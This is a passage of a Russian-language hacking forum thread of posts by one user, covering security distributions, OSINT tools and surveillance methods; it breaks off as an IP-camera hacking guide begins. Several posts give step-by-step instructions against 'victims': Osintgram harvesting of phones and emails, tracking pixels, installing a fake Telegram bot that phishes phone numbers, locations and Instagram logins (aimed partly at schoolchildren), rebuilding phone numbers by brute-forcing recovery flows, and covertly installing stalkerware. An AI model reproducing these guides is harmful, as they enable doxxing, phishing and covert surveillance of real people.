Parrot OS — это продукт Parrot Security, дистрибутив GNU/Linux, основанный на Debian. Эта операционная система предназначена для обеспечения безопасности и конфиденциальности. Хакеры любят работать с Parrot ОС из-за ее полного переносимого арсенала услуг ИТ-безопасности и цифровой криминалистики. Parrot поддерживает платформы Anosurf, FALON 1.0, Qt5, .NET/mono, LUKS, Truecrypt и VeraCrypt. Также у Parrot OS есть интересные функции, такие как полная анонимность, криптография, песочница, программирование и разработка, аппаратный взлом и т.д.
4.DEFT Linux
https://i.gyazo.com/41391cb0fa5a4fd229ca08cf8a729eed.jpg
DEFT — это бесплатное программное обеспечение с открытым исходным кодом, разработанное на платформе Linux Ubuntu и оснащенное удобным графическим интерфейсом. В продукт добавлен набор профильных утилит, начиная антивирусами, системами поиска информации в кэше браузера, сетевыми сканерами и другими различными утилитами, заканчивая инструментами, которые необходимы при проведении поиска скрытой информации на диске. Предназначен для компьютерной криминалистики и информационной безопасности.
5. Samurai Web Testing Framework
https://i.gyazo.com/a39b01fbb2660451b66b31f3d084df48.jpg
Samurai Web Testing Framework— это операционная система для хакеров, которая имеет лучшие инструменты для тестирования и атаки веб-сайтов. Имеет открытый исходный код, предоставляется бесплатно. Особенности Samurai WTF заключаются в том, что он оснащен SVN и имеет инструменты WebApp Pentest: Burpsuite, SQLMap другие. В качестве основы использует Ubuntu.
BlackMAST
28.09.2022, 17:53
https://i.gyazo.com/5b3b8628dcdf903bdff47c2efadacaff.jpg
Вступить в наш чат
Возможно вы иногда замечали такие сообщения, которые вы вроде как не открывали, но в мессенджере стоит статус «прочитано». Или же просто вам кажется, что кто-то следит за диалогом. Часто бывает, что такие мысли — это не просто паранойя.
Наверняка у каждого однажды закрадывалось сомнение — а не читает ли кто-то мои переписки? Сегодня расскажем про способ, который поможет опровергнуть или подтвердить мысли о приглядывании за вами.
Как проверить слежку
В основе данного способа лежит всем известный сервис privnote.com. Он создаёт самоуничтожающиеся записки, но у сервиса так же есть функция оповещения о прочтении. Она и будет выступать капканом для того, чтобы проверить, не просматривает ли кто-то третий ваш диалог.
Создаем заметку с любым текстом. Можно даже с какой-то зловещей фразой, чтобы возможный следопыт почувствовал себя некомфортно:
https://i.gyazo.com/e4552a4cf50ebfea31b7e3f03bbe72cf.png
2. Нажимаем кнопку «Показать параметры» и выставляем галочку на пункте «Не спрашивать подтверждение перед тем, как показать и уничтожить записку».
https://i.gyazo.com/4ef99f56b61e1d2a5af7573a8d4d8b24.png
3. Указываем почту на которую придёт уведомление о прочтении и нажимаем «Создать записку».
4. Укорачиваем ссылку в любом сервисе и делаем её безобидной. Закинуть ссылку можно туда, где предполагаемо завелась крыса: например, переписки или заметки.
Вашего шпиона как-то надо забайтить на эту ссылку. Если это диалог, то тут уже включаем фантазию и пишем то, что может быть интересно для того, кто следит за сообщениями:
https://i.gyazo.com/c4ec5b135f44a39811e3fd4143c45cd1.png
ВАЖНО! Перед тем, как отправить ссылку в диалог обязательно предупредите собеседника в безопасном канале связи (а лучше лично), чтобы он не открывал ссылку, иначе план не сработает.
Таким образом, если кто-то перейдёт по ссылке, то вам на почту придёт оповещение, и вы узнаете, следит ли кто-то лишний за вашими переписками, документами, заметками и т.д.
BlackMAST
30.09.2022, 15:40
https://i.gyazo.com/6701861d5d93cc8833c3ba524298a9d3.jpg
Вступить в наш чат
Наверняка, вы ни раз стирали историю браузера, а вместе с этим удаляли что-то важное. Или же хотели пошпионить за кем-то, узнав, какие сайты и страницы посещает человек. А, возможно, вы случайно удалили файл, и теперь думаете, что он безвозвратно потерян. Но это не так — у нас есть решение! Обычно, стирая историю или файл со своего внутреннего или внешнего диска, вы не удаляете их реальное содержимое; скорее, пространство, которое они занимали.
И сегодня мы расскажем вам о 3 способах, как восстановить историю браузера и случайно удалённые файлы с ПК.
https://i.gyazo.com/99cfe9562fa30bcfde820a7978d8b11e.png
Способ 1: использование командной строки и кэша DNS в Windows
Это немного технический метод, который дает нам имена всех доменов, которые мы посетили. Обратите внимание, что домены и скрипты, загруженные из рекламы, также будут показываться. Таким образом, вы можете получить кучу доменов.
Откройте командную строку или CMD с помощью панели поиска Windows.
https://i.gyazo.com/0491f84be871bfb349034bc07d48189f.jpg
Теперь в командной строке введите команду ipconfig /displaydns, как показано на изображении ниже, и нажмите Enter.
https://i.gyazo.com/068f68215d4a01fd4e39f3a9e4788289.jpg
Теперь вы можете увидеть все посещённые домены, однако нельзя посмотреть более подробную информацию о странице, только название конкретного сайта.\
https://i.gyazo.com/e4cc0ab1ad40ce967615c533fac16687.jpg
Способ 2: восстановление истории и файлов с помощью программы Recuva
Помимо вышеописанного способа, вы всегда можете использовать специальную программу, такую как Recuva. Она является бесплатной и поможет восстановить потерянные данные.
Скачайте программу и установите на свой компьютер.
https://i.gyazo.com/56e6567c07c4ca4d20fadc189fc3719e.jpg
Далее выберите какие файлы вы хотите восстановить.
https://i.gyazo.com/2c3aa22d70165201b1afba4282c96eb7.jpg
Файлы истории Google Chrome обычно хранятся по этому пути по умолчанию: C:\Users\Username\AppData\Local\Google\Chrome\User Data\Default.
Укажите любой другой диск, на котором будет производиться поиск потерянных файлов. Программа выполнит первичное сканирование, в результате которого покажет вам в удобной форме все недавно удаленные файлы, которые подлежат восстановлению.
https://i.gyazo.com/777d45c2c7ae1a94759ddaf0b8282a77.jpg
В меню параметров вы можете легко отфильтровать список, пропуская файлы весом ноль байт или скрытые документы.
Если результаты покажут файл с красным кругом, то восстановление невозможно; если же вы видите зеленый круг, то вы сможете восстановить данные почти с полной уверенностью. Оранжевый круг означает вероятность 50%.
https://i.gyazo.com/d1e8b9024ad66217c1e71055c9eaeae2.jpg
Способ 3: восстановление системы
Этот метод следует использовать только в крайнем случае, поскольку он откатит систему назад.
Перейдите в строку поиска и введите восстановление системы.
Выберите данную опцию, и вы увидите все точки восстановления на вашем устройстве.
https://i.gyazo.com/c2dbedd491fbd2acca6d3a5423a93fc6.jpg
Щелкните нужную точку восстановления и подтвердите. После согласия, все изменения, сделанные после этой точки восстановления, будут отменены, и ваши данные будут восстановлены.
https://i.gyazo.com/457d0f8201f5fcdde6af5b4bb0ad5cd1.jpg
BlackMAST
07.10.2022, 13:08
https://i.gyazo.com/a268ea29fb8f6015b7a7b359ce90c04c.jpg
Вступить в наш чат
В сегодняшней статье мы расскажем вам как пробить пользователя Инстаграм с помощью одной лишь утилиты. Вы узнаете как выжать максимум полезной информации из профиля жертвы, зная только никнейм. Итак, начнём.
https://i.gyazo.com/231f760a836bf982b19ebb27c3313982.jpg
Мы не призываем вас к каким-либо действиям, статья написана исключительно в ознакомительных целях.
Что нужно для работы:
Программа, скачиваем на GitHub;
Python3 версии 3.6+;
Аккаунт инстаграма.
Osintgram
А поможет нам в этом утилита Osintgram. Это инструмент OSINT, позволяющий быстро собрать все данные о конкретной странице.
После скачивания приступим к установке, для этого введите команды:
git clone https://github.com/Datalux/Osintgram.git
cd Osintgram
pip install -r requirements.txt
Перед запуском утилиты вам потребуется создать и добавить аккаунт. Это нужно сделать в файле credentials.ini, который лежит в каталоге config, в папке с программой. Вводим логин и пароль своего аккаунта и сохраняем.
Не забудьте о своей безопасности, используйте левый профиль.
https://i.gyazo.com/772f78db79a2793321945d29555c815a.jpg
Далее можно приступить к использованию Osingram. Для начала давайте откроем справку:
python3 main.py -h
https://i.gyazo.com/e06027fd1a2889c1c8d8e4c1f7d2eb43.jpg
использование: main.py [-h] [-C] [-j] [-f] [-c COMMAND] [-o OUTPUT] id
Osintgram - это инструмент OSINT в Instagram. Он предлагает интерактивную оболочку для выполнения анализа аккаунта Instagram любого пользователя по его нику.
обязательные аргументы:
id имя пользователя
необязательные аргументы:
-h, --help показать это сообщение и выйти
-C, --cookies очистить предыдущие cookies
-j, --json сохранить результат в файл JSON
-f, --file сохранить результат в файл
-c COMMAND, --command COMMAND
запустить в однокомандном режиме и выполнить предоставленную команду
-o OUTPUT, --output OUTPUT
где хранить фотографии
Исходя из информации выше, нам нужно ввести только имя интересующего пользователя.
Так и делаем:
python3 main.py nickname
https://i.gyazo.com/67181b7c26bd1aab941a5b0c70bbe7b0.jpg
После успешного логина, видим список команд для сохранения результатов и приглашение к вводу. Чтобы увидеть команды для анализа профиля вводим: list
https://i.gyazo.com/e12031bdead5c4a0be45735236378f6a.jpg
Команды для Osintgram
Ниже представлен список команд, которые может выполнить утилита.
addrs - cобрать все адреса из фотографий цели (отметки мест в инсте);
captions - собрать все подписи к фотографиям цели;
comments - получить количество комментариев ко всем постам цели;
followers - собрать всех подписчиков цели;
followings - собрать всех, на кого цель подписана;
fwersemail - собрать email адреса подписчиков;
fwingsemail - собрать email адреса страниц, на которых подписана цель;
fwersnumber - собрать телефоны подписчиков;
fwingsnumber - собрать телефоны страниц, на которых подписана цель;
hashtags - собрать все хештеги, используемые целевой страницей;
info - собрать общую информацию о странице;
likes - получить суммарное количество лайков на странице;
mediatype - собрать посты по их типу (фото или видео);
photodes - собрать описания фотографий цели;
photos - скачать все фотографии с целевой страницы;
propic - скачать фотографии профиля целевой страницы;
stories - скачать все доступные сторис страницы;
tagged - собрать всех пользователей, упомянутых на странице по юзернейму;
wcommented - собрать всех пользователей, оставлявших комментарии на странице;
wtagged - собрать всех пользователей, кто упоминал страницу.
Трудно не заметить большие возможности Osintgram. Но для начала давайте узнаем общие данные о нашей цели. Вводим команду: info
https://i.gyazo.com/2d9666513fce7deb299f985542eb78ac.jpg
И уже видим полезную информацию. Но этого мало, поэтому предлагаем узнать номера телефонов пользователей, на которых подписана жертва.
Вводим: fwingsnumber. И Osintgram спросит хотим ли мы получить все возможные телефоны? Мы ограничимся лишь 10 для примера.
https://i.gyazo.com/a9fa3fcaef9b3732d0e093c4c6798d3a.jpg
И мы видим конкретный результат. Теперь проделываем тоже самое, но только с электронными почтами.
Вводим: fwingsemail
https://i.gyazo.com/cdefd364114d8e3a3533b236a9375501.jpg
И здесь Osintgram показал удовлетворительный результат. Остальные команды работают по аналогичному принципу. Ну а что, где и когда применять — решать вам.
Стоит также отметить, что результат мы можем сохранять в txt файл. Для этого перед запуском команд введите FILE=y.
Что касается закрытых аккаунтов, то тут программа пока бессильна. Для того, чтобы разведка сработала, вам заранее нужно заполучить подписку нашей цели, в значит включить в ход навыки социальной инженерии. На этом все. Удачи!
BlackMAST
07.10.2022, 21:14
https://i.gyazo.com/cc0751d1212b554b36539bdaa233cae7.jpg
Вступить в наш чат
Пробив данных раньше был чем-то вроде привилегии — доступен только узкому кругу лиц. Многие до сих пор думают, что для этого нужны какие-то супер секретные программы, которых нет в открытом доступе.
Этой статьей разрушаем мифы, а также рассказываем об одном из самых простых способов пробива.
Сервис GetNotify
К сожалению или к счастью, в Интернете есть всё. Пользователь, однажды сюда попавший оставляет свой след, порой подробный настолько, что его без труда может отыскать каждый.
https://i.gyazo.com/62da338742ce3eeac6ae17a5609718d9.png
С помощью этого способа можно получить доступ к самой интересной информации: местоположение, IP-адрес и время у интересующего человека. Сервис уже хорошо знаком западным пользователям, но в руки к СНГ комьюнити попал не так давно.
Чтобы собрать необходимую информацию, отлично подходит сервис GetNotify. Он позиционирует себя как бесплатный инструмент для слежки, для которого требуется лишь адрес электронной почты.
Ежедневно тысячи пользователей получают и отправляют письма по электронной почте. GetNotify.com — это бесплатная служба отслеживания Email, которая уведомляет клиента, когда отправленное письмо прочитано.
Более того, сервис утверждает, что их техника отслеживания электронной почты невидима для получателя, что обеспечивает полную анонимность и развязывает руки для слежки.
Как это работает
Сервис добавляет в сообщение небольшое невидимое изображение, которое выполняет функцию трекера. И как только получатель откроет такое письмо, то детективу, решившему опробовать сервис, сразу придет уведомление о прочтении.
Однако, на этом чудеса не заканчиваются. GetNotify по доброте душевной щедро поделится и другой более полезной информацией, которую ему удалось раздобыть:
IP-адрес получателя
географическое местоположение
часовой пояс
операционная система
используемый браузер
https://i.gyazo.com/9478cdc1d64e06ee4433c5dbe9ad2675.png
Важно, что сервис предоставляет такие услуги бесплатно. Чтобы начать слежку, достаточно зарегистрироваться на сайте и ввести Email жертвы. Всё остальное сервис выполнит сам.
BlackMAST
10.10.2022, 13:04
https://i.gyazo.com/bb1c2e366905c7dee534c48a487ea0ff.jpg
Вступить в наш чат
В телеграме существует огромное количество ботов, которые предлагают различные услуги: пробив, накрутка, знакомства и т.д. Но знаете ли вы как создать собственного поддельного бота для деанонимизации? Сегодня мы рассмотрим инструмент Dnnme2 для пробива пользователей телеграм.
Оставайтесь с нами, и вы узнаете, что это очень просто.
https://i.gyazo.com/f77dd18c8bf2dfc2e12fc85265c0bdc3.jpg
Вся информация в этой статье предоставлена исключительно в ознакомительных целях. Мы не несем ответственности за ваши действия.
Что значит поддельный бот
Это фейк-бот, который внешне ни чем не отличается от обычного бота, предоставляющего какие-то услуги (накрутку, пробив, донаты, знакомства). Разница лишь в том, что пользователь не получает того, за чем обратился к боту, а вместо этого, сам того не подозревая, сливает личные данные о себе, которые сразу отправляются к вам. Таким образом, вы можете узнать номер телефона, точную геолокацию пользователя и другую персональную информацию. И все это бесплатно.
Что потребуется:
Python;
Телеграм (Не используйте свой основной аккаунт).
Установка DNNME
Для того, чтобы установить программу, поочередно введите следующие команды в командную строку:
git clone //github.com/lamer112311/Dnnme2
cd Dnnme2
pip install -r requirements.txt
python build.py
https://i.gyazo.com/d22008f1149e4cfeb01e16dd686467af.jpg
Далее вас попросят ввести ваш Telegram ID, чтобы узнать его переходим в бота @my_id_bot и вводим команду: start.
После этого бот выдаст вам ваш ID, он нужен для того, чтобы бот вам мог присылать данные тех, кто пользовался данным ботом.
Создаем бота
После этого нам нужно создать бота для деанона. Для этого:
Переходим в BotFather (https://forum.antichat.xyz/members/808530/) и выбираем: newbot;
Вводим любое имя боту (можно на русском);
Вводим юзернейм боту с окончанием bot;
Далее вы получите ссылку на нашего бота и токен (он обведен красным);
Копируем токен, который обведен красным на скриншоте ниже;
Переходим по ссылке на бота и нажимаем: start.
https://i.gyazo.com/94f60c03e4205805a4b690834810830d.jpg
Режимы бота:
Пробив по номеру - это фейк-бот для пробива. Как только жертва зарегистрируется в боте, бот автоматически соберёт данные: номер, ID, имя пользователя. Кроме того, в боте есть запрос на геолокацию, информация о которой тоже поступит прямиком к вам.
Накрутка инстаграм - фейк-бот, который используется в качестве инструмента для накрутки инстаграма. Жертва, желающая накрутить лайки и подписчиков, регистрируется в боте, отправляя боту свои данные для входа. Однако, в боте нет запроса на геолокацию.
Бравл старс - бот, охватывающий, по большей части, только школьников. Исходя из практики, 90% пользователей, играющих в Brawl Stars готовы отправить любую информацию для получения доната на свой аккаунт. Бот присылает номер телефона и геолокацию жертвы.
Знакомства - фейк-бот для знакомств. На наш взгляд, самый эффективный бот, поскольку собирает не только контакты и данные о местоположении, но и личную информацию, которую жертва заполняет в виде анкеты о себе.
Итак, выбираем любой, из выше предложенных шаблонов. И для активации бота, вводим:
python probiv.рy (в зависимости от выбранного режима).
https://i.gyazo.com/0b24b67b3d2076757cbbfc82e960fd0a.jpg
Заходим к нашему боту, по указанному ранее адресу, и следуем его инструкциям.
После чего, скидываем жертве нашего бота, используя социальную инженерию.
Пример работы бота
Полученные данные о жертве будут приходить в ваш телеграм и в терминал:
https://i.gyazo.com/11206536a34d5d5836a0b8cb780eff8c.jpg
https://i.gyazo.com/9ee07a244a1d27e6701bd04c1bfe52d5.jpg
Информация о геолокации приходит вместе с координатами на Гугл картах:
https://i.gyazo.com/5a76d45c561014c67a9ead8aae6b562f.jpg
На это все. Удачи в разведке!
BlackMAST
12.10.2022, 12:48
https://i.gyazo.com/a348aeb31783754621259525c2a2daeb.jpg
Вступить в наш чат
Думаете, что вычислить номер телефона с нуля невозможно? Вы будете приятно удивлены, узнав, что это не так. Мы проявили немного изобретательности и ловкости, и нашли действенный способ. И сегодня мы вам о нем поведаем.
https://i.gyazo.com/6a14fce0d2dc2077c153eb93d1be52b0.jpg
Для того, чтобы узнать номер телефона человека, вы должны знать его:
email;
инстаграм;
вк.
Хотя другие соц. сети и аккаунты нам тоже могут помочь. Читайте до конца.
Собираем пазл из цифр телефона
Этот способ представляет из себя собирание пазла по кусочкам. Да, он требует усилий и вашего времени, но результат себя оправдывает.
1) Первые 5 кусочков пазла или же 5 цифр номера телефона мы можем получить из восстановления почты.
Безусловно, для этого вам нужно знать имейл пользователя, чей телефон вы пробиваете.
https://i.gyazo.com/15160128cad266af832958477351d755.jpg
Восстановление mail.ru почты даст нам первые 5 цифр (на доменах list, bk, mail, inbox, internet). Таким образом, получаем: +79998******.
2) Следующие 2 цифры получаем методом перебора в почте. Но тут стоит отметить, что, после 10 попыток почта ставит ограничение на час (поэтому максимально понадобится времени ~9 часов) Теоретически, вы можете просидеть и дольше, чтобы узнать 3-4 следующие цифры, но в этом уже нет особого смысла, так как есть способ быстрее.
Получаем: +7999890****
https://i.gyazo.com/935491a53f4bba0898119af1f94948ec.jpg
3) Последние 2 цифры можно получить через восстановление этих соц.сетей:
• Instagram (только в приложении, по аккаунту/почте)
Нужно нажать по своему логину в Instagram и выбрать «Добавить аккаунт», затем «Войти в существующий аккаунт».
В следующем окне выбираем «Забыли пароль?» и далее вводим логин профиля. Готово. Теперь мы имеем последние 2 цифры телефона.
https://i.gyazo.com/069904c8c9237f80d241e29f50f0331a.jpg
• Google (по аккаунту/почте + ФИ)
• Microsoft (по аккаунту/почте)
• Facebook (по полному имени/почте)
Получаем: +7999890**55
4) Оставшиеся 2 цифры можно перебрать по "номеру телефона", всего 100 вариантов:
• Skype (в начале проверяется почта, а потом по номеру ищется этот же аккаунта, ограничения не известны)
• Microsoft (ограничения не известны)
• Google (ограничения не известны)
• Facebook
• Сбербанк (15 попыток перевода)
• ВК (нужен сам аккаунт, капча на каждую проверку)
Остаётся только проверить полученный номер телефона на валидность.
Вуаля. Пазл собран.
BlackMAST
17.10.2022, 12:49
https://i.gyazo.com/7d010857138f22d218a35a383bc891ac.jpg
Вступить в наш чат
Хотите узнать с кем человек ведёт переписки в телефоне, какие сайты посещает и где он находится в данный момент? Вы можете отслеживать ВСЕ его действия в телефоне 24/7. И сегодня мы расскажем вам как установить слежку в телефоне с помощью приложения iKeyMonitor. Оно доступно как на Android, так и на iOS устройствах.
Вся информация в этой статье предоставлена исключительно в ознакомительных целях. Мы не несем ответственности за ваши действия.
https://i.gyazo.com/08bdca57364fce41d634f7adb2c2d006.jpg
iKeyMonitor
Что это за программа
Данное приложение было разработано для родительского контроля за телефоном ребёнка, но тем не менее оно широко вошло в обиход среди любителей пошпионить за телефоном других пользователей.
Стоимость
Стоит отметить, что приложение является платным, но имеет 30 дневный бесплатный пробный период. Если вам оно не нужно на постоянной основе, то пробного периода вполне будет достаточно, чтобы вывести жертву на чистую воду.
Ну а если вы захотите продлить, то стоимость подписки следующая:
https://i.gyazo.com/5fa53dc91fcdb4b0b90d4be8d481d031.jpg
Месяц полного мониторинга обойдётся вам примерно в 3700р.
Как работает
https://i.gyazo.com/b5fd1c7537c69cf9f33f4400c938258e.jpg
1. В отличие от других приложений для мониторинга, которые могут отслеживать действия только конкретных приложений, iKeyMonitor контролирует абсолютно каждое приложение, записывая нажатия клавиш.
2. Приложение позволяет удаленно делать фотографии и скриншоты в режиме реального времени. Вы сможете видеть, что окружает жертву в данный момент.
3. Функция Ambient Listening & Recording позволяет записывать и слушать окружающие звуки в режиме реального времени.
4. iKeyMonitor записывавает сообщения и сразу отправляет их вам. Даже если жертва сразу удалит переписку, сообщения останутся у вас в истории.
5. Удаленно записывает входящие и исходящие звонки с помощью встроенного диктофона.
6. И, конечно, же отслеживает любую активность в приложениях.
https://i.gyazo.com/0895eced48cc87f221f33f33881e0bf6.jpg
Регистрация
Выберите тип устройства жертвы.
https://i.gyazo.com/0bc15a7be58a55f250355d7d0496998c.jpg
При этом приложение спросит, есть ли у вас доступ к девайсу, за которым вы хотите установить слежку. Вам придётся применить СИ, чтобы установить программу на телефон жертвы.
https://i.gyazo.com/1b908afe1aaaddf97c7e2eefc7224188.jpg
https://i.gyazo.com/7cc80286bf81b6985050bee218c0d264.jpg
Проверьте почту для подтверждения регистрации.
После этого выполните вход и вы увидите панель, которая выглядит следующим образом:
https://i.gyazo.com/981688f87dae923da79767240f20d4f4.jpg
Готово! Теперь ничто не ускользнёт от вашего взора.
BlackMAST
19.10.2022, 12:52
https://i.imgur.com/XmKpcYp.jpg
Вступить в наш чат
В наши дни уже невозможно найти человека в Интернете, у которого нет ни единого профиля в соцсетях. Как правило, пользователи выкладывают много личной информации и контента: фото, видео, образование, круг общения и даже геолокацию. Другими словами, они делают себя доступной мишенью для злоумышленников. Но как же быстро найти и собрать все эти данные о человеке?
Сегодня мы расскажем о полезном инструменте, без которого не обойтись начинающему OSINTеру при сборе информации в социальных сетях.
https://i.imgur.com/PdYoerP.png
Social Analyzer
Social Analyzer находит профили в более чем 1000 социальных сетях. Инструмент содержит различные модули анализа и обнаружения, и вы можете выбрать, какие модули использовать в вашей разведке.
Основан на технологии OSINT, что означает технологию разведки с открытым исходным кодом. Этот инструмент позволяет пользователям находить потенциальные профили человека в более чем 1000 социальных сетях, веб-сайтах и веб-приложениях. Social Analyzer использует различные модули анализа для поиска профилей человека, поэтому так активно используется многими правоохранительными органами для расследования киберпреступлений.
Подготовка
Для работы вам, конечно же, понадобится Kali Linux.
Устанавливаем Kali Linux,
Скачиваем на GitHub Social Analyzer.
Этот инструмент написан на python, поэтому в вашем Kali Linux должен быть установлен python.
Установка
Откройте терминал операционной системы Kali Linux и используйте следующую команду для установки инструмента:
https://i.imgur.com/PxKnb5V.jpg
Инструмент был установлен в Kali Linux. Теперь посмотрим, как он работает на примере.
Используя социальный анализатор, найдите данные о человеке в самых популярных соц. сетях. Для этого введите команду с ником или именем пользователя.
social-analyzer --username "nickname" --metadata
https://i.imgur.com/rZAY4hO.jpg
Готово. Утилита нашла все совпадения никнейма пользователя в самых популярных социальных сетях и собрала метаданные о нем. Как видите, инструмент очень прост в использовании. Удачи!
BlackMAST
21.10.2022, 13:27
https://i.gyazo.com/096cd63ac710b3b21b419829567d46c6.jpg
Вступить в наш чат
В Интернете нас окружает множество ситуаций, ставящих под угрозу нашу безопасность, поэтому мы находимся в вечной погоне за анонимностью, но действительно ли мы анонимны? Малейшая ошибка, невнимательность и ваша личность будет раскрыта. Но существует инструмент, который поможет оставаться вам в тени при любых обстоятельствах, и название ему — WHOAMI. Он обеспечивает повышенную конфиденциальность и анонимность при использовании Linux ОС.
https://i.gyazo.com/176027169ce547fbde95fc46b95eaa2d.jpg
Установка
Прежде чем мы начнем устанавливать этот инструмент на наш Linux, мы должны проверить несколько инструментов, которые являются обязательными для этого инструмента, такие как: -tar, git, tor, curl, python3, python3-scapy.
Как правило, они уже установлены в нашем Linux, но если у вас их нет, вы можете просто запустить следующую команду:
sudo apt update && sudo apt install tar tor curl python3 python3-scapy network-manager
Можем двигаться дальше. Введите в терминале:
git clone https://github.com/omer-dogan/kali-whoami
Теперь измените директорий на kali-whoami:
sudo make install
И после этого наш инструмент готов к использованию, мы можем открыть его интерфейс, выполнив эту команду:
sudo kali-whoami --help
https://i.gyazo.com/da48f5ac4cadb0c563fe29684de2113a.png
Запускаем инструмент с помощью этой команды:
sudo kali-whoami --start
https://i.gyazo.com/d63b6871a5bae314f20246b21aeb5ab2.png
Здесь мы должны выбрать параметры, которые мы хотим включить, для этого просто выберите цифру для включения, а если вы хотите отключить, то нажмите этот номер еще раз.
https://i.gyazo.com/7b90e55d1561b105ae6a68c03de1e0c6.png
После включения, у вас появится галочка рядом с номером, значит, что защита работает, и вы анонимны.
Опции
Ниже приведены возможности инструмента:
1. Anti Mitm — блокирует Mitm-атаку. Mitm или man-in-the-middle - это атака, когда злоумышленник пропускает трафик жертвы через себя, то есть получает доступ к вашему логину, паролю, а еще ведёт прослушку и многое другое.
2. Log Killer — с помощью log killer вы удалите все ваши журналы, логи.
3. IP changer — тут все элементарно, скрипт меняет ваш айпи.
4. DNS changer — помогает изменить DNS сервер, используемый при подключении к сети.
5. Mac changer — даёт возможность сменить MAC-адрес компьютера.
6. Timezone changer — установка иного часового пояса.
7. Hostname changer — задаёт другое имя хоста (имя компьютера), чтобы нельзя было идентифицировать в сети.
8. Browser anonymization — после включения этой функции мы напрямую подключаемся к браузеру tor и можем анонимно сёрфить.
9. Anti cold boot — предотвращает атаку методом холодной перезагрузки, при которой хакер может извлекать из вашего ПК ключи шифрования и другие ценные данные.
Как видите, возможности внушающие, вам лишь остаётся определиться с нужными именно вам опциями и просто подключить их.
Чтобы проверить статус подключения, используйте следующую команду:
sudo kali-whoami --status
https://i.gyazo.com/193d8fdc1a5353f852b8ac9b9d3588ea.png
Инструмент поможет оставаться вам анонимными до тех пор, пока вы его не отключите, выполнив следующую команду:
sudo kali-whoami --stop
https://i.gyazo.com/1883c1bb324f67a3ef19d189b83b4184.png
На этом все. Удачи!
BlackMAST
27.10.2022, 12:46
https://i.gyazo.com/286eba23e0bed4421f8692d0ca1bdcfe.jpg
Вступить в наш чат
В этой статье речь пойдет о создании токена, а именно ERC-20. Используя генератор токенов Token Generator dApp на платформе SmartContracts Tools вы можете за несколько минут создать новый токен на блокчейне Ethereum или BNB.
https://i.gyazo.com/73aaf7e8d1e95d3e924fa43d540bba6b.jpg
Переходим на сайт SmartContracts Tools и выбираем Token Generator.
Для создания токена необходимо подключиться к платформе MetaMask. На данный момент в сервисе можно найти несколько тарифных планов. У вас есть возможность сделать токен HelloÈRC20 за бесплатно, SimpleERC20 будет стоить 0,03 ETH, а за PowerfulERC20 придется заплатить 0,5 ETH. Можно выбирать дополнительные функции для увеличения эмиссии, дефляционных свойств и т.д.
https://i.gyazo.com/e99b4bb25ba207c6bcc3b71df192d7b8.jpg
Вам нужно указать тип токена и блокчейна, на котором он будет размещен. На данный момент доступны к использованию ERC20-токены с использованием Ethereum и PolyGon, а также BEP20-токены на базе Binance SmartChain.
При выборе ETH, вы можете развернуть токен в основной сети или на тестовой сети Sepolia.
А дальше все просто: выбираем новому токен название и знак, которые он будет иметь.
Указываем характеристики эмиссии: ограниченная, фиксированная или бесконечная. Далее указываем кто получает доступ к токену. Также можно указать роль администратора или ответственного по эмиссии.
В любом случае, даже если вы выбрали бесплатный тариф, вам придется заплатить за газ.
Как только все поля будут заполнены, появится надпись “Создать токен”, подтверждаем и становимся счастливыми обладателями собственного цифрового актива ERC-20, который имеет верифицированный код смарт-контракта.
https://i.gyazo.com/20438986741c93a48060fee4aba923a9.png
Вот так просто, за два клика можно создать собственный токен. Дальнейшее использование зависит лишь от вашей фантазии и необходимой задачи. Пользуйтесь с умом и следите за новыми статьями! На этом все. Удачи!
BlackMAST
31.10.2022, 12:46
https://i.gyazo.com/0c3b70d7c9490a270f3c792022643118.jpg
Вступить в наш чат
Любой пользователь сети может стать жертвой сниффинга. Хакеры все чаще используют анализаторы траффика для взлома, поскольку они славятся своей простой и эффективностью. Когда речь заходит про снифферы, у многих возникает путаница в терминологии и непонимание, как это работает. Сегодня мы постараемся подробно все рассказать.
Поехали!
Что это такое
Сниффер (от англ. sniff - нюхать) — это программа для перехвата и анализа данных в сети.
https://i.gyazo.com/ce1b834e5bef3fdd91aee715510b638c.gif
Для чего нужно
Как правило, снифферы используются во благо, т.е. для анализа трафика с целью выявления и устранения отклонений в процессе работы. При этом хакеры нашли им другое применение, которое может нанести вред обычным пользователям. Так, они могут использовать их для перехвата логинов, паролей и другой необходимой им информации. Злоумышленники чаще всего ставят снифферы в местах, где есть незащищенное подключение Wi-Fi: кафе, аэропорты, ТРЦ.
Виды снифферов
Выделяют два вида снифферов:
локальный сниффер
онлайн сниффер
В зависимости от типа, снифферы могут передаваться онлайн, например, в виде ссылок или устанавливаться непосредственно на компьютер.
Сниферры могут быть разных видов, но все их объединяет одно — перехват траффика.
Обзор снифферов
CommView
Декодирует пакеты передаваемой информации, а затем выдает статистику используемых протоколов.Он может собирать информацию о трафике IP-пакетов. Также он может работать с популярными протоколами.
Сниффить данные можно при помощи вкладки «Текущие IP-соединения», где вы можете создавать дубликаты адресов.
Spynet
Spynet выполняет функции декодирования пакетов, их перехвата. С его помощью можно воссоздать страницы, которые посещает пользователь. Интерфейс просто в использовании. Для перехвата данных необходимо запустить программу Capture Start. Так же программа является бесплатной.
BUTTSniffer
BUTTSniffer анализирует непосредственно сетевые пакеты. Принцип работы — это перехват передаваемых данных, а так же возможность их автоматического сохранения на носителе, что очень удобно. Запуск данной программы происходит через командную строку.
Помимо этих программ-снифферов, существует множество других, не менее известных: CooperSniffer, WinDump, Ne Analyzer, dsniff, NetXRay, NatasX, LanExplorter.
Как защититься
Обнаружить сниффер гораздо проблематичнее, чем сразу принять меры по защите от него.
Регулярно делайте проверки на наличие уязвимостей в локальной сети;
Избегайте Wi-Fi подключения в общественных местах;
Используйте антивирус со сканером сети, распознающий снифферы;
Задайте сложные уникальные пароли;
Зашифруйте каналы связи с помощью криптографических систем.
Вывод
Как вы могли заметить из данной статьи, пользователь сам решает в каких целях ему использовать сниффер - во благо или для хакинга. Как бы то ни было, мы желаем вам удачи! Надеемся, что данная информация была полезной.
BlackMAST
03.11.2022, 12:36
https://i.gyazo.com/bea796edb7fd12f0c79ed5047ffd2d86.jpg
Вступить в наш чат
Хотите узнать, как хакнуть камеру видеонаблюдения? Тогда вы пришли по адресу. В этой статье мы расскажем, как хакеры проникают в системы видеонаблюдения, поделимся с вами сайтом со взломанными камерами со всего мира и шаг за шагом научимся находить и устанавливать слежку за IP-камерами с помощью Angry IP Scanner.
https://i.gyazo.com/aafb3766a3a8e72ce549a77de5e2df49.jpg
Дисклеймер: Данная статья предоставлена исключительно в образовательных целях. Мы не несём ответственности за любые ваши действия.
Способы взлома
Существуют различные способы по взлому камер видеонаблюдения. Давайте подробно рассмотрим их:
Способ № 1: Сайты со взломанными камерами
